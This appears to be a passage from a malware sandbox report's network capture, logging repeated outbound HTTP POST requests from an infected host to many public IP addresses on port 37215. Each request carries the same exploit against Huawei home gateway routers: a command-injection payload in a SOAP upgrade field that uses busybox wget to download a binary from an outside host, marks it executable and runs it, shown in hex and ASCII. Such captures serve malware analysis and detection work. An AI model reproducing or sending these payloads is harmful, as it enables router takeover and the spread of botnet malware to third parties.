                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1720192.168.2.1541300188.138.152.8937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945308924 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1721192.168.2.154751845.223.247.5437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945337057 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1722192.168.2.1548624181.101.237.22437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945352077 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1723192.168.2.154057841.134.213.4837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945374966 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1724192.168.2.1536008181.201.82.20537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945395947 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1725192.168.2.1553332122.106.226.12337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945420980 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1726192.168.2.1534402138.216.191.23937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945437908 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1727192.168.2.1537362122.133.204.22637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945453882 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1728192.168.2.155732837.118.220.19437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945466042 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1729192.168.2.1551072156.51.125.24137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945502043 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1730192.168.2.155318241.92.148.15637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945506096 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
